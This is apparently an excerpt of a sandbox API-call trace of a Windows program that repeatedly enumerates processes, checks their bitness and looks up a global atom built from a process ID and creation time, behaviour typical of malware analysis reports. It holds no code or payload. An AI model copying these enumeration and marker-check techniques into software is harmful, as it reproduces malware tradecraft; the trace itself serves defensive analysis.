	[0077.008] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.008] CloseHandle (hObject=0x224) returned 1
	[0077.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0077.009] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.009] CloseHandle (hObject=0x224) returned 1
	[0077.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0077.009] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.009] CloseHandle (hObject=0x224) returned 1
	[0077.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0077.009] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.009] CloseHandle (hObject=0x224) returned 1
	[0077.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0077.009] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.009] CloseHandle (hObject=0x224) returned 1
	[0077.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0077.009] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.009] CloseHandle (hObject=0x224) returned 1
	[0077.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0077.010] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0077.010] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.010] CloseHandle (hObject=0x224) returned 1
	[0077.010] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0077.010] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.010] CloseHandle (hObject=0x224) returned 1
	[0077.010] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0077.010] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.010] CloseHandle (hObject=0x224) returned 1
	[0077.010] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0077.010] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0077.010] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.010] CloseHandle (hObject=0x224) returned 1
	[0077.010] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0077.010] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.010] CloseHandle (hObject=0x224) returned 1
	[0077.011] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0077.011] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.011] CloseHandle (hObject=0x224) returned 1
	[0077.011] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0077.011] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.011] CloseHandle (hObject=0x224) returned 1
	[0077.011] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0077.011] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.011] CloseHandle (hObject=0x224) returned 1
	[0077.011] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0077.011] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.011] CloseHandle (hObject=0x224) returned 1
	[0077.011] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0077.011] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.011] CloseHandle (hObject=0x224) returned 1
	[0077.011] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0077.011] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.011] CloseHandle (hObject=0x224) returned 1
	[0077.012] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0077.012] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.012] CloseHandle (hObject=0x224) returned 1
	[0077.012] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0077.012] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.012] CloseHandle (hObject=0x224) returned 1
	[0077.012] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0077.012] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.012] CloseHandle (hObject=0x224) returned 1
	[0077.012] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0077.012] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.012] CloseHandle (hObject=0x224) returned 1
	[0077.012] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0077.012] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.012] CloseHandle (hObject=0x224) returned 1
	[0077.012] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0077.012] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.012] CloseHandle (hObject=0x224) returned 1
	[0077.013] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0077.013] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.013] CloseHandle (hObject=0x224) returned 1
	[0077.013] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0077.013] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.013] CloseHandle (hObject=0x224) returned 1
	[0077.013] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0077.013] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.013] CloseHandle (hObject=0x224) returned 1
	[0077.013] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0077.013] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.013] CloseHandle (hObject=0x224) returned 1
	[0077.013] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0077.013] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.013] CloseHandle (hObject=0x224) returned 1
	[0077.014] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0077.014] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.014] CloseHandle (hObject=0x224) returned 1
	[0077.014] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0077.014] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0077.014] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0077.014] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0077.014] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0077.014] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0077.014] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0077.015] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0077.015] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0077.015] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0077.015] CloseHandle (hObject=0x224) returned 1
	[0077.015] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0077.015] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0077.015] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.015] CloseHandle (hObject=0x224) returned 1
	[0077.015] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0077.015] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0077.015] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.015] CloseHandle (hObject=0x224) returned 1
	[0077.084] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0077.085] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0077.085] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0077.085] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0077.085] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0077.085] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0077.085] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0077.085] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0077.085] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0077.085] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0077.085] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0077.085] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0077.086] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0077.086] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0077.086] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0077.086] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0077.086] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0077.086] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0077.086] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0077.086] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.086] CloseHandle (hObject=0x224) returned 1
	[0077.086] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0077.086] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0077.086] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0077.086] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.086] CloseHandle (hObject=0x224) returned 1
	[0077.087] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0077.087] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0077.087] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.087] CloseHandle (hObject=0x224) returned 1
	[0077.087] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0077.087] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.087] CloseHandle (hObject=0x224) returned 1
	[0077.087] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0077.087] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.087] CloseHandle (hObject=0x224) returned 1
	[0077.087] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0077.087] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.087] CloseHandle (hObject=0x224) returned 1
	[0077.087] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0077.087] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.087] CloseHandle (hObject=0x224) returned 1
	[0077.087] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0077.087] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.087] CloseHandle (hObject=0x224) returned 1
	[0077.087] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0077.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0077.088] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.088] CloseHandle (hObject=0x224) returned 1
	[0077.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0077.088] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.088] CloseHandle (hObject=0x224) returned 1
	[0077.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0077.088] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.088] CloseHandle (hObject=0x224) returned 1
	[0077.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0077.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0077.088] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.088] CloseHandle (hObject=0x224) returned 1
	[0077.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0077.088] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.088] CloseHandle (hObject=0x224) returned 1
	[0077.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0077.088] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.088] CloseHandle (hObject=0x224) returned 1
	[0077.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0077.089] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.089] CloseHandle (hObject=0x224) returned 1
	[0077.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0077.089] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.089] CloseHandle (hObject=0x224) returned 1
	[0077.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0077.089] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.089] CloseHandle (hObject=0x224) returned 1
	[0077.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0077.089] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.089] CloseHandle (hObject=0x224) returned 1
	[0077.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0077.089] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.089] CloseHandle (hObject=0x224) returned 1
	[0077.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0077.089] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.089] CloseHandle (hObject=0x224) returned 1
	[0077.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0077.089] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.089] CloseHandle (hObject=0x224) returned 1
	[0077.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0077.090] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.090] CloseHandle (hObject=0x224) returned 1
	[0077.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0077.090] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.090] CloseHandle (hObject=0x224) returned 1
	[0077.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0077.090] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.090] CloseHandle (hObject=0x224) returned 1
	[0077.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0077.090] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.090] CloseHandle (hObject=0x224) returned 1
	[0077.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0077.090] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.090] CloseHandle (hObject=0x224) returned 1
	[0077.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0077.090] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.091] CloseHandle (hObject=0x224) returned 1
	[0077.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0077.091] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.091] CloseHandle (hObject=0x224) returned 1
	[0077.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0077.091] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.091] CloseHandle (hObject=0x224) returned 1
	[0077.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0077.091] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.091] CloseHandle (hObject=0x224) returned 1
	[0077.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0077.091] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.091] CloseHandle (hObject=0x224) returned 1
	[0077.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0077.092] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0077.092] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0077.092] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0077.092] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0077.092] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0077.092] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0077.092] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0077.092] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0077.092] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0077.092] CloseHandle (hObject=0x224) returned 1
	[0077.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0077.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0077.093] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.093] CloseHandle (hObject=0x224) returned 1
	[0077.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0077.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0077.093] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.093] CloseHandle (hObject=0x224) returned 1
	[0077.162] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0077.162] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0077.162] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0077.162] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0077.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0077.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0077.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0077.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0077.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0077.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0077.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0077.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0077.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0077.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0077.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0077.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0077.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0077.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0077.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0077.164] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.164] CloseHandle (hObject=0x224) returned 1
	[0077.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0077.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0077.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0077.164] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.164] CloseHandle (hObject=0x224) returned 1
	[0077.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0077.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0077.164] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.164] CloseHandle (hObject=0x224) returned 1
	[0077.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0077.165] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.165] CloseHandle (hObject=0x224) returned 1
	[0077.165] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0077.165] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.165] CloseHandle (hObject=0x224) returned 1
	[0077.165] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0077.165] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.165] CloseHandle (hObject=0x224) returned 1
	[0077.165] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0077.165] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.165] CloseHandle (hObject=0x224) returned 1
	[0077.165] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0077.165] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.165] CloseHandle (hObject=0x224) returned 1
	[0077.165] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0077.165] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0077.165] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.165] CloseHandle (hObject=0x224) returned 1
	[0077.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0077.166] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.166] CloseHandle (hObject=0x224) returned 1
	[0077.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
